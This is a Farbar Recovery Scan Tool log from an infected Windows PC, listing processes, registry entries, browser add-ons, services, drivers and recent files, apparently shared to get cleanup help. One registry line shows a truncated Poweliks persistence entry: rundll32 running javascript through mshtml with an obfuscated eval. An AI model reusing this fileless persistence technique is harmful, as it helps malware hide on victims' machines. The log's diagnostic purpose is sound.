(Intuit) C:\Program Files\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2014\avgui.exe
(AVG Secure Search) C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe
(Schneider Electric) C:\Program Files\APC\PowerChute Personal Edition\dataserv.exe
() C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\loggingserver.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(TeamViewer GmbH) C:\Users\Dale\AppData\Local\Temp\TeamViewer\Version9\TeamViewer.exe
(TeamViewer GmbH) C:\Users\Dale\AppData\Local\Temp\TeamViewer\Version9\tv_w32.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\plugin-container.exe
(Adobe Systems, Inc.) C:\Windows\System32\Macromed\Flash\FlashPlayerPlugin_11_9_900_170.exe
(Adobe Systems, Inc.) C:\Windows\System32\Macromed\Flash\FlashPlayerPlugin_11_9_900_170.exe
(TeamViewer GmbH) C:\Users\Dale\AppData\Local\Temp\TeamViewer\Version9\TeamViewer_Desktop.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [AVG_UI] => C:\Program Files\AVG\AVG2014\avgui.exe [5188112 2014-08-25] (AVG Technologies CZ, s.r.o.)
HKU\S-1-5-21-941127145-1180520044-1929224469-1000\...\RunOnce: [FlashPlayerUpdate] => C:\Windows\system32\Macromed\Flash\FlashUtil32_11_9_900_170_Plugin.exe [839560 2014-01-08] (Adobe Systems Incorporated)
HKU\S-1-5-21-941127145-1180520044-1929224469-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
ShellIconOverlayIdentifiers: GDriveBlacklistedOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
ShellIconOverlayIdentifiers: GDriveSharedEditOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
ShellIconOverlayIdentifiers: GDriveSharedViewOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
ShellIconOverlayIdentifiers: GDriveSyncedOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
ShellIconOverlayIdentifiers: GDriveSyncingOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.google.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
SearchScopes: HKLM - {443789B7-F39C-4b5c-9287-DA72D38F4FE6} URL = http://search.aol.com/aolcom/search?query={searchTerms}&invocationType=tb50aoldesktopie7
SearchScopes: HKCU - {443789B7-F39C-4b5c-9287-DA72D38F4FE6} URL = http://search.aol.com/aolcom/search?query={searchTerms}&invocationType=tb50aoldesktopie7
SearchScopes: HKCU - {95B7759C-8C7F-4BF1-B163-73684A933233} URL = http://isearch.avg.com/search?cid={21E441B3-EF26-436F-A6A1-95B7AB175FB8}&mid=a9a15af4a8a247d0815bd15a34568ce3-376f6faec36d28a09c55704a5acf6cec25c189f2&lang=en&ds=AVG&pr=fr&d=2012-03-25 12:31:25&v=15.3.0.11&pid=avg&sg=0&sap=dsp&q={searchTerms}
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll (CANON INC.)
BHO: AVG Safe Search -> {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -> C:\Program Files\AVG\AVG2012\avgssie.dll No File
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre6\bin\ssv.dll (Sun Microsystems, Inc.)
BHO: AVG Security Toolbar -> {95B7759C-8C7F-4BF1-B163-73684A933233} -> C:\Program Files\AVG Secure Search\18.1.9.799\AVG Secure Search_toolbar.dll (AVG Secure Search)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
Toolbar: HKLM - AVG Security Toolbar - {95B7759C-8C7F-4BF1-B163-73684A933233} - C:\Program Files\AVG Secure Search\18.1.9.799\AVG Secure Search_toolbar.dll (AVG Secure Search)
Toolbar: HKLM - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll (CANON INC.)
Toolbar: HKCU - No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll (Microsoft Corporation)
Handler: intu-help-qb2 - {84D77A00-41B5-4b8b-8ADF-86486D72E749} - C:\Program Files\Intuit\QuickBooks 2009\HelpAsyncPluggableProtocol.dll (Intuit, Inc.)
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG2012\avgpp.dll No File
Handler: qbwc - {FC598A64-626C-4447-85B8-53150405FD57} - C:\Windows\system32\mscoree.dll (Microsoft Corporation)
Handler: viprotocol - {B658800C-F66E-4EF3-AB85-6C0C227862A9} - C:\Program Files\Common Files\AVG Secure Search\ViProtocolInstaller\18.1.9\ViProtocol.dll (AVG Secure Search)
Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 208.180.42.68 208.180.42.100
 
FireFox:
========
FF ProfilePath: C:\Users\Dale\AppData\Roaming\Mozilla\Firefox\Profiles\pyqw91t4.default
FF DefaultSearchEngine: Conduit Search
FF SelectedSearchEngine: Conduit Search
FF Homepage: about:home
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_11_9_900_170.dll ()
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @avg.com/AVG SiteSafety plugin,version=11.0.0.1,application/x-avg-sitesafety-plugin -> C:\Program Files\Common Files\AVG Secure Search\SiteSafetyInstaller\18.1.9\\npsitesafety.dll No File
FF Plugin: @canon.com/EPPEX -> C:\Program Files\Canon\Easy-PhotoPrint EX\NPEZFFPI.DLL (CANON INC.)
FF Plugin: @Google.com/GoogleEarthPlugin -> C:\Program Files\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin: @java.com/JavaPlugin -> C:\Program Files\Java\jre6\bin\plugin2\npjp2.dll (Sun Microsystems, Inc.)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @viewpoint.com/VMP -> C:\Program Files\Viewpoint\Viewpoint Experience Technology\npViewpoint.dll ()
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF SearchPlugin: C:\Program Files\mozilla firefox\browser\searchplugins\avg-secure-search.xml
FF Extension: Firefox Old Version Update Hotfix - C:\Users\Dale\AppData\Roaming\Mozilla\Firefox\Profiles\pyqw91t4.default\Extensions\firefox-hotfix@mozilla.org.xpi [2014-08-22]
FF HKLM\...\Firefox\Extensions: [avg@toolbar] - C:\ProgramData\AVG Secure Search\FireFoxExt\18.1.9.799
FF Extension: AVG Security Toolbar - C:\ProgramData\AVG Secure Search\FireFoxExt\18.1.9.799 [2014-08-25]
 
Chrome: 
=======
CHR DefaultSuggestURL: Default -> {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client=chrome&q={searchTerms}&{google:cursorPosition}sugkey={google:suggestAPIKeyParameter}
CHR CustomProfile: C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-07-06]
CHR Extension: (Google Drive) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-07-06]
CHR Extension: (YouTube) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-07-06]
CHR Extension: (Google Search) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-07-06]
CHR Extension: (AVG Security Toolbar) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\ndibdjnfmopecpmkdieinmbadjfpblof [2013-07-06]
CHR Extension: (Gmail) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2013-07-06]
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 AOL ACS; C:\Program Files\Common Files\AOL\ACS\AOLAcsd.exe [46640 2006-10-23] (AOL LLC)
R2 APC Data Service; C:\Program Files\APC\PowerChute Personal Edition\dataserv.exe [21880 2012-01-24] (Schneider Electric)
R2 APC UPS Service; C:\Program Files\APC\PowerChute Personal Edition\mainserv.exe [705912 2012-01-24] (Schneider Electric)
S2 AVGIDSAgent; C:\Program Files\AVG\AVG2014\avgidsagent.exe [3242000 2014-08-25] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files\AVG\AVG2014\avgwdsvc.exe [289328 2014-08-25] (AVG Technologies CZ, s.r.o.)
R2 IJPLMSVC; C:\Program Files\Canon\IJPLM\IJPLMSVC.EXE [138192 2011-02-07] ()
R2 MDM; C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\mdm.exe [335872 2006-10-26] (Microsoft Corporation) [File not signed]
R2 QBCFMonitorService; C:\Program Files\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe [45056 2011-12-22] (Intuit) [File not signed]
S2 SDScannerService; C:\Program Files\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
S2 SDUpdateService; C:\Program Files\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
S2 SDWSCService; C:\Program Files\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)
R2 vToolbarUpdater18.1.9; C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe [1820184 2014-08-12] (AVG Secure Search)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R1 Avgdiskx; C:\Windows\System32\DRIVERS\avgdiskx.sys [121624 2014-06-30] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdriverx.sys [200984 2014-07-21] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHX; C:\Windows\System32\DRIVERS\avgidshx.sys [147736 2014-06-17] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSShim; C:\Windows\System32\DRIVERS\avgidsshimx.sys [21272 2014-06-17] (AVG Technologies CZ, s.r.o.)
R1 Avgldx86; C:\Windows\System32\DRIVERS\avgldx86.sys [188696 2014-06-17] (AVG Technologies CZ, s.r.o.)
R0 Avglogx; C:\Windows\System32\DRIVERS\avglogx.sys [241944 2014-06-17] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx86; C:\Windows\System32\DRIVERS\avgmfx86.sys [98584 2014-08-06] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx86; C:\Windows\System32\DRIVERS\avgrkx86.sys [27416 2014-06-17] (AVG Technologies CZ, s.r.o.)
R1 Avgtdix; C:\Windows\System32\DRIVERS\avgtdix.sys [197400 2014-06-17] (AVG Technologies CZ, s.r.o.)
R1 avgtp; C:\Windows\system32\drivers\avgtpx86.sys [42784 2014-08-12] (AVG Technologies)
R3 wanatw; C:\Windows\System32\DRIVERS\wanatw4.sys [33588 2006-11-29] (America Online, Inc.)
R3 catchme; \??\C:\Users\Dale\AppData\Local\Temp\catchme.sys [X]
S2 DgiVecp; \??\C:\Windows\system32\Drivers\DgiVecp.sys [X]
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
U3 mbr; \??\C:\ComboFix\mbr.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-09-14 18:13 - 2014-09-14 18:13 - 00000000 ____D () C:\Users\Dale\AppData\Roaming\TeamViewer
2014-09-14 18:12 - 2014-09-14 18:12 - 04691456 _____ (TeamViewer) C:\Users\Dale\Downloads\TeamViewerQS_en.exe
2014-09-13 18:58 - 2014-09-13 18:58 - 00054720 _____ () C:\ComboFix.txt
2014-09-13 12:00 - 2014-09-13 12:00 - 02347384 _____ (ESET) C:\Users\Dale\Downloads\esetsmartinstaller_enu.exe
2014-09-13 11:54 - 2014-09-13 11:54 - 00231760 _____ () C:\Users\Dale\Downloads\CrucialScan.exe
2014-09-13 11:47 - 2014-09-14 19:14 - 00014807 _____ () C:\Users\Dale\Desktop\FRST.txt
2014-09-13 11:47 - 2014-09-14 19:02 - 00000000 ____D () C:\FRST
2014-09-13 10:44 - 2011-06-26 01:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-09-13 10:44 - 2010-11-07 12:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-09-13 10:44 - 2009-04-19 23:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-09-13 10:44 - 2000-08-30 19:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-09-13 10:44 - 2000-08-30 19:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-09-13 10:44 - 2000-08-30 19:00 - 00098816 _____ () C:\Windows\sed.exe
2014-09-13 10:44 - 2000-08-30 19:00 - 00080412 _____ () C:\Windows\grep.exe
2014-09-13 10:44 - 2000-08-30 19:00 - 00068096 _____ () C:\Windows\zip.exe
2014-09-13 10:41 - 2014-09-13 10:41 - 00000000 ____D () C:\Users\Dale\Documents\ProcAlyzer Dumps
2014-09-13 10:19 - 2014-09-13 18:58 - 00000000 ____D () C:\Qoobox
2014-09-13 10:19 - 2014-09-13 11:38 - 00000000 ____D () C:\Windows\erdnt
2014-09-13 10:18 - 2014-09-13 02:20 - 01097728 _____ (Farbar) C:\Users\Dale\Desktop\FRST.exe
2014-09-13 10:18 - 2014-09-13 02:19 - 05577449 ____R (Swearware) C:\Users\Dale\Desktop\ComboFix.exe
2014-09-13 01:38 - 2014-09-13 01:50 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-09-13 01:34 - 2014-09-13 01:34 - 00001020 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-13 01:34 - 2014-09-13 01:34 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-13 01:34 - 2014-09-13 01:34 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-09-13 01:34 - 2014-05-12 07:26 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-09-13 01:34 - 2014-05-12 07:25 - 00074456 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-09-13 01:33 - 2014-09-13 01:33 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\Dale\Downloads\mbam-setup-2.0.2.1012.exe
2014-09-13 00:33 - 2014-09-13 00:33 - 00007605 _____ () C:\Users\Dale\AppData\Local\Resmon.ResmonCfg
2014-09-12 19:00 - 2014-08-19 12:39 - 00327872 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-09-12 19:00 - 2014-08-18 17:26 - 17455104 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-09-12 19:00 - 2014-08-18 17:08 - 04232704 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-09-12 19:00 - 2014-08-18 16:57 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-09-12 19:00 - 2014-08-18 16:57 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-09-12 19:00 - 2014-08-18 16:46 - 00454656 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-09-12 19:00 - 2014-08-18 16:45 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-09-12 19:00 - 2014-08-18 16:44 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-09-12 19:00 - 2014-08-18 16:44 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-09-12 19:00 - 2014-08-18 16:42 - 02185728 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-09-12 19:00 - 2014-08-18 16:39 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-09-12 19:00 - 2014-08-18 16:39 - 00032768 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-09-12 19:00 - 2014-08-18 16:37 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-09-12 19:00 - 2014-08-18 16:36 - 00112128 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-09-12 19:00 - 2014-08-18 16:36 - 00108032 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-09-12 19:00 - 2014-08-18 16:35 - 00597504 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-09-12 19:00 - 2014-08-18 16:30 - 00646144 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-09-12 19:00 - 2014-08-18 16:27 - 00365056 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-09-12 19:00 - 2014-08-18 16:22 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-09-12 19:00 - 2014-08-18 16:19 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-09-12 19:00 - 2014-08-18 16:17 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-09-12 19:00 - 2014-08-18 16:17 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-09-12 19:00 - 2014-08-18 16:15 - 11769856 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-09-12 19:00 - 2014-08-18 16:09 - 00603136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-09-12 19:00 - 2014-08-18 16:08 - 02014208 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-09-12 19:00 - 2014-08-18 16:08 - 00673792 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-09-12 19:00 - 2014-08-18 16:07 - 01068032 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-09-12 19:00 - 2014-08-18 15:46 - 01812992 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-09-12 19:00 - 2014-08-18 15:38 - 01190400 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-09-12 19:00 - 2014-08-18 15:36 - 00678400 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-09-12 18:59 - 2014-06-26 20:45 - 02285056 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2vdec.dll
2014-09-12 18:14 - 2014-09-12 18:14 - 00000000 ____D () C:\Users\Dale\AppData\Local\Microsoft_Corporation
2014-09-12 03:57 - 2014-07-06 20:40 - 01059840 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2014-09-12 03:57 - 2014-07-06 20:40 - 00550912 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2014-09-12 03:41 - 2014-08-01 06:35 - 00793600 _____ (Microsoft Corporation) C:\Windows\system32\TSWorkspace.dll
2014-09-12 00:48 - 2014-09-04 20:52 - 00445952 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-09-12 00:48 - 2014-09-04 20:47 - 00302592 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-09-08 09:30 - 2014-09-13 00:13 - 00196608 ____R () C:\Users\Dale\Desktop\Lawyers Abstract & Title Co.QBW.TLG
2014-09-08 09:30 - 2014-09-13 00:13 - 00000355 _____ () C:\Users\Dale\Desktop\Lawyers Abstract & Title Co.QBW.ND
2014-09-04 11:33 - 2014-09-12 18:14 - 00000618 _____ () C:\Users\Dale\Desktop\avgrep.txt
2014-09-02 19:12 - 2014-09-02 21:16 - 00181295 _____ () C:\Windows\system32\avgrep.txt
2014-08-28 00:19 - 2014-08-22 20:46 - 00305152 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2014-08-28 00:19 - 2014-08-22 19:42 - 02352640 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-08-26 18:37 - 2014-08-26 18:37 - 00000000 ____D () C:\ProgramData\Avg_Update_0814tb
2014-08-26 18:37 - 2014-08-26 18:37 - 00000000 ____D () C:\Program Files\AVG Security Toolbar
2014-08-24 09:47 - 2014-08-24 09:47 - 00000000 ____D () C:\Users\Dale\AppData\Roaming\AVG2014
2014-08-24 09:43 - 2014-09-08 12:49 - 00000895 _____ () C:\Users\Public\Desktop\AVG 2014.lnk
2014-08-24 09:43 - 2014-08-24 09:43 - 00000000 ____D () C:\Users\Dale\AppData\Roaming\TuneUp Software
2014-08-24 09:39 - 2014-08-24 09:45 - 00000000 ____D () C:\ProgramData\AVG2014
2014-08-24 09:36 - 2014-08-25 00:06 - 00000000 ____D () C:\Users\Dale\AppData\Local\Avg2014
2014-08-24 09:30 - 2014-08-24 09:31 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2014-08-23 08:14 - 2014-05-14 11:23 - 01973728 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2014-08-23 08:14 - 2014-05-14 11:23 - 00054240 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2014-08-23 08:14 - 2014-05-14 11:23 - 00045536 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2014-08-23 08:14 - 2014-05-14 11:17 - 02425856 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2014-08-23 08:13 - 2014-05-14 11:23 - 00581600 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2014-08-23 08:13 - 2014-05-14 11:23 - 00036320 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
2014-08-23 08:13 - 2014-05-14 11:17 - 00092672 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2014-08-22 15:39 - 2014-08-22 15:39 - 00002091 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2014-08-22 15:39 - 2014-08-22 15:39 - 00002079 _____ () C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
2014-08-22 15:38 - 2014-09-12 23:23 - 00000000 ____D () C:\Program Files\Spybot - Search & Destroy 2
2014-08-22 15:38 - 2014-08-22 15:39 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2014-08-22 15:38 - 2013-09-20 10:49 - 00018968 _____ (Safer Networking Limited) C:\Windows\system32\sdnclean.exe
2014-08-22 15:33 - 2014-08-22 15:35 - 46525608 _____ (Safer-Networking Ltd. ) C:\Users\Dale\Downloads\spybot-2.4.exe
2014-08-19 01:09 - 2014-05-14 09:23 - 00179656 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2014-08-19 01:09 - 2014-05-14 09:17 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2014-08-16 18:18 - 2014-06-30 17:14 - 00008856 _____ (Microsoft Corporation) C:\Windows\system32\icardres.dll
2014-08-16 18:18 - 2014-06-06 01:16 - 00035480 _____ (Microsoft Corporation) C:\Windows\system32\TsWpfWrp.exe
2014-08-16 18:18 - 2014-03-09 16:47 - 00619672 _____ (Microsoft Corporation) C:\Windows\system32\icardagt.exe
2014-08-16 18:18 - 2014-03-09 16:47 - 00099480 _____ (Microsoft Corporation) C:\Windows\system32\infocardapi.dll
2014-08-15 21:38 - 2014-07-13 20:42 - 00654336 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2014-08-15 21:38 - 2014-06-15 20:44 - 00730048 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
2014-08-15 21:38 - 2014-06-15 20:44 - 00219072 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms1.sys
2014-08-15 21:38 - 2014-06-15 20:40 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\cdd.dll
2014-08-15 21:36 - 2014-07-15 21:46 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2014-08-15 21:36 - 2014-06-03 04:30 - 00101824 _____ (Microsoft Corporation) C:\Windows\system32\consent.exe
2014-08-15 21:36 - 2014-06-03 04:29 - 02363392 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-08-15 21:36 - 2014-06-03 04:29 - 01805824 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
2014-08-15 21:36 - 2014-06-03 04:29 - 00337408 _____ (Microsoft Corporation) C:\Windows\system32\msihnd.dll
2014-08-15 21:35 - 2014-06-24 20:41 - 12874240 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-09-14 19:14 - 2014-09-13 11:47 - 00014807 _____ () C:\Users\Dale\Desktop\FRST.txt
2014-09-14 19:02 - 2014-09-13 11:47 - 00000000 ____D () C:\FRST
2014-09-14 18:49 - 2013-06-22 11:23 - 00000882 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-09-14 18:33 - 2012-07-06 18:03 - 02059731 _____ () C:\Windows\WindowsUpdate.log
2014-09-14 18:13 - 2014-09-14 18:13 - 00000000 ____D () C:\Users\Dale\AppData\Roaming\TeamViewer
2014-09-14 18:12 - 2014-09-14 18:12 - 04691456 _____ (TeamViewer) C:\Users\Dale\Downloads\TeamViewerQS_en.exe
2014-09-14 17:49 - 2013-06-22 11:23 - 00000878 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-09-13 19:23 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\rescache
2014-09-13 18:58 - 2014-09-13 18:58 - 00054720 _____ () C:\ComboFix.txt
2014-09-13 18:58 - 2014-09-13 10:19 - 00000000 ____D () C:\Qoobox
2014-09-13 18:53 - 2009-07-13 21:04 - 00000215 _____ () C:\Windows\system.ini
2014-09-13 18:37 - 2009-07-13 23:34 - 00020704 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-09-13 18:37 - 2009-07-13 23:34 - 00020704 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-09-13 18:26 - 2012-03-25 21:02 - 00000000 ____D () C:\Program Files\RegZooka
2014-09-13 18:25 - 2014-07-09 18:33 - 00002140 _____ () C:\Windows\setupact.log
2014-09-13 18:25 - 2014-07-09 18:32 - 00027664 _____ () C:\Windows\PFRO.log
2014-09-13 18:25 - 2009-07-13 23:53 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
